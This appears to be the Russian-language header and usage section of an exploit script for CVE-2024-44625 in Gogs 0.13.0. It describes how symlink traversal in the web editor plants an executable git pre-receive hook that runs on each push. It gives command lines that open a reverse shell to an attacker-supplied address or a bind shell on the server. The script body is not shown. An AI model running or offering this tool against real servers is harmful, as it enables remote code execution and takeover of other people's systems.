
Эксплойт для CVE-2024-44625 в Gogs 0.13.0, обеспечивающий удалённое выполнение кода через переход по символической ссылке для создания git-хука, с режимами reverse и bind shell.
Проверено на Gogs эпохи 0.13.0 за обратным прокси. Примитив: переход по символической ссылке в веб-редакторе на ОТСУТСТВУЮЩИЙ .git/hooks/pre-receive создаёт этот файл (исполняемый). Каждый последующий push в репозиторий выполняет его.
Использование:
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost <YOUR_IP> --lport 4444
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode bind --bind-port 5555
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost IP --lport 4444 --repo <name> --reuse --triggers 3
Примечания: